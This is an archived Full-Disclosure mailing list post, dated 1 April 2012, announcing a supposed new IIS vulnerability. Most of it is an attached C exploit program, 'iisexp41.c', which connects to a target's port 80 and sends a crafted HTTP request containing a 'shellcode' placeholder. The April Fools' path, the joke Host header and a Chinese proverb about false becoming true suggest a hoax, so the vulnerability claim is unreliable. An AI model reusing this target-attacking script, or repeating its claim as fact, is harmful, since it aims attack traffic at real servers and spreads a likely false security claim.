| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <SNT104-W654693ADB8B6900544D877C44F0@phx.gbl>
Date: Sun, 1 Apr 2012 07:51:09 +0000
From: yuange <yuange1975@...mail.com>
To: full-disclosure <full-disclosure@...ts.grok.org.uk>
Subject: FW: iis bug
the exp file. /* iisexp41.c ver4.1 copy by @yuange1975 2012.4.1
假作真时真亦假。 http://weibo.com/yuange1975
http://twitter.com/yuange75
http://hi.baidu.com/yuange1975/blog/item/ac368655017819dbb745aeee.html
*/
#include <stdio.h>
#include <stdlib.h>#include <winsock2.h>
#include <windows.h>
#include <mswsock.h>
#include <wsnwlink.h>
#include <ws2tcpip.h>
#include <process.h> /* _beginthread, _endthread */
#include <errno.h>
#include <io.h>
#include <conio.h>#pragma comment(lib,"ws2_32")
#pragma comment(lib,"Mswsock")char *AprilFoolsDay ="GET /AprilFools'Day.php HTTP/1.1\r\nHOST:weibo.com/yuange1975\r\na=b\nc:shellcode\r\n\r\n"; static unsigned int maybe_lookup_host(char* name)
{
unsigned long ulAddr = INADDR_NONE; /* Don't bother resolving raw IP addresses, naturally. */
ulAddr = inet_addr((char*)name);
if ( ulAddr != INADDR_NONE && ulAddr != INADDR_ANY )
return (unsigned int)ulAddr; return 0;
}int do_exp(char *hostname,unsigned int port)
{
SOCKET hScoket = INVALID_SOCKET;
struct sockaddr_in sin;
unsigned int addr=0;
int write_res = 0;
char * crash_buf=NULL;
int crash_buflen=0; /*
create SOCKET
*/
hScoket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0/*WSA_FLAG_OVERLAPPED*/);
if (hScoket == INVALID_SOCKET) {
printf_s("WSASocket function failed with error = %d\n", WSAGetLastError() );
return -1;
} /* Resolved IP address */
addr = maybe_lookup_host(hostname); sin.sin_family = AF_INET;
sin.sin_port = htons(port);
memcpy(&sin.sin_addr,&addr,4); /*
connect
*/
if ( connect(hScoket, (struct sockaddr*) &sin, sizeof(struct sockaddr_in) ) == SOCKET_ERROR) {
if ( WSAEWOULDBLOCK != WSAGetLastError() ) {
closesocket(hScoket);
printf_s("connect function failed with error: %ld\n", WSAGetLastError());
return -1;
}
}
printf("[*] connected to %s:%d\n",hostname,port);
//build_crash_package(&crash_buf,&crash_buflen); crash_buf = AprilFoolsDay;
crash_buflen = strlen(AprilFoolsDay);
/*
send data to remote target
*/
write_res = send( hScoket,
crash_buf,
crash_buflen,
0);
printf("[*] send %d bytes\n",write_res);
closesocket(hScoket);
return 0;
}int main(int argc, const char **argv)
{
int iResult;
int count=0;
char * target_ip = (char*)argv[1];
WSADATA wsaData; if ( !target_ip || argc < 2 ) {
printf_s("usage: <target_ip>\n");
return 0;
}
/* Initialize Winsock */
iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
if (iResult != 0) {
printf_s("WSAStartup failed: %d\n", iResult);
return -1;
} do_exp(target_ip,80);
/* clean - win socket */
WSACleanup(); return 0;
}
From: yuange1975@...mail.com
To: full-disclosure@...ts.grok.org.uk
Subject: iis bug
Date: Sun, 1 Apr 2012 03:30:29 +0000
iis new bug:
http://weibo.com/yuange1975
poc:
char *AprilFoolsDay ="GET /AprilFools'Day.php HTTP/1.1\r\nHOST:http://weibo.com/yuange1975\r\na=b\nc:shellcode\r\n\r\n";
Content of type "text/html" skipped
View attachment "iisexp41.c" of type "text/plain" (2879 bytes)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists